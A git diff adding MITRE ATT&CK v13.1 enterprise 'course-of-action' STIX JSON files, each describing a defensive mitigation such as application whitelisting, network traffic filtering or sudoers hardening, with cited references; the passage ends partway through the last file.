+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--3e237046-0a51-4bba-b823-e0ae70fbac84",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1013",
+ "external_id": "T1013"
+ },
+ {
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "source_name": "Beechey 2010"
+ }
+ ],
+ "modified": "2019-07-25T11:26:14.570Z",
+ "name": "Port Monitors Mitigation",
+ "description": "Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json
new file mode 100644
index 0000000000000000000000000000000000000000..e0c41431003f1eb4f88b6ac3abb9aa3913f4b9e8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json
@@ -0,0 +1,31 @@
+{
+ "type": "bundle",
+ "id": "bundle--f0faacb1-658d-465e-b853-7c9d86b58514",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f",
+ "type": "course-of-action",
+ "created": "2019-06-11T16:30:16.672Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "M1035",
+ "url": "https://attack.mitre.org/mitigations/M1035"
+ }
+ ],
+ "modified": "2020-06-09T20:51:00.027Z",
+ "name": "Limit Access to Resource Over Network",
+ "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json
new file mode 100644
index 0000000000000000000000000000000000000000..b26590cd4c8e6aa843bbcf4006709c6703513c1d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--ad71dc38-130f-486f-b355-d818d549a8e1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1155", + "external_id": "T1155" + }, + { + "source_name": "applescript signing", + "description": "Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.", + "url": "https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/" + } + ], + "modified": "2019-07-24T14:31:55.409Z", + "name": "AppleScript Mitigation", + "description": "Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json new file mode 100644 index 0000000000000000000000000000000000000000..7419e92394828ce98c9c50750437c642530a0e4e --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f2c3b025-ec98-4e8f-a6a4-014a4a652bd0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1202", + "url": "https://attack.mitre.org/mitigations/T1202", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + }, + { + "source_name": "SpectorOPs SettingContent-ms Jun 2018", + "url": "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "description": "Nelson, M. (2018, June 11). The Tale of SettingContent-ms Files. Retrieved April 18, 2019." + } + ], + "modified": "2021-08-23T20:25:19.370Z", + "name": "Indirect Command Execution Mitigation", + "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json new file mode 100644 index 0000000000000000000000000000000000000000..b27e7a08ff1232b714b098e07061084014416c01 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5f8d0e0b-4c0e-4da4-a5ed-b5f36cc5e030", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1135", + "url": "https://attack.mitre.org/mitigations/T1135", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.867Z", + "name": "Network Share Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json new file mode 100644 index 0000000000000000000000000000000000000000..42545cb4dd6adf2e7d8d4bdd65dbd8b879d5e458 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--d46b96b5-f39a-4bb1-bdb2-d96a2194e3ee", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea", + "type": "course-of-action", + "created": "2019-06-06T21:21:13.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1029", + "url": "https://attack.mitre.org/mitigations/M1029" + } + ], + "modified": "2019-06-06T21:21:13.027Z", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json new file mode 100644 index 0000000000000000000000000000000000000000..e3e4b0721e5e45a608548fa9274b25fac57a7ff2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--e6a56f63-3a3e-4501-9fb5-12af9312e223", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "type": "course-of-action", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1037", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "modified": "2020-06-20T20:46:36.342Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json new file mode 100644 index 0000000000000000000000000000000000000000..cfcc0f5377efe7560c83e9746e84062c7285c95f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--ef10963b-d281-4e80-9ce1-accf45c79391", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96", + "type": "course-of-action", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1021", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "modified": "2019-06-06T20:52:59.206Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json new file mode 100644 index 0000000000000000000000000000000000000000..96eb432a695c5ebc25f75d0e8e92d7bb1adfd186 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--f08a5c33-9bc6-4254-8ffb-c392da8ce13a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1130", + "url": "https://attack.mitre.org/mitigations/T1130", + "source_name": "mitre-attack" + }, + { + "source_name": "Wikipedia HPKP", + "description": "Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.", + "url": "https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning" + }, + { + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "source_name": "SpectorOps Code Signing Dec 2017" + } + ], + "modified": "2020-03-31T12:49:14.885Z", + "name": "Install Root Certificate Mitigation", + "description": "HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)\n\nWindows Group Policy can be used to manage root certificates and the Flags value of HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. 
(Citation: SpectorOps Code Signing Dec 2017)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json new file mode 100644 index 0000000000000000000000000000000000000000..b05e96c6c47262f271f9a7055155b6232e3d9612 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--884e37b5-2d71-4463-9e3b-eee908d6cae7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1169", + "external_id": "T1169" + } + ], + "modified": "2019-07-25T12:03:12.876Z", + "name": "Sudo Mitigation", + "description": "The sudoers file should be strictly edited such that passwords are always required and that users can\u2019t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json new file mode 100644 index 0000000000000000000000000000000000000000..0c7c88b9eacc732217f65baae6d098d185a08f24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c8efa55b-365b-425a-971f-32e632d5e77e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1079", + "external_id": "T1079" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T11:15:39.400Z", + "name": "Multilayer Encryption Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json new file mode 100644 index 0000000000000000000000000000000000000000..9809dce9f189608675c1e14358bdaf3b47838762 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--a8b7925d-048c-471a-9c25-bb480b18ffd4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--245075bc-f992-4d89-af8c-834c53d403f4", + "type": "course-of-action", + "created": "2019-04-24T17:03:39.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1493", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1493" + } + ], + "modified": "2019-07-25T12:28:59.970Z", + "name": "Transmitted Data Manipulation Mitigation", + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json new file mode 100644 index 0000000000000000000000000000000000000000..92e38b0cc9e61fb7b779644938b859b1c3edc3ac --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3fb0daee-3701-4895-aa61-8e0723f87617", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1020", + "url": "https://attack.mitre.org/mitigations/T1020", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:22.459Z", + "name": "Automated Exfiltration Mitigation", + "description": "Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json new file mode 100644 index 0000000000000000000000000000000000000000..6085d3a975d781016582e9b88a642fd1d292935c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--76e11ed1-aa3e-4078-8055-d322c3d52561", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1010", + "url": "https://attack.mitre.org/mitigations/T1010", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
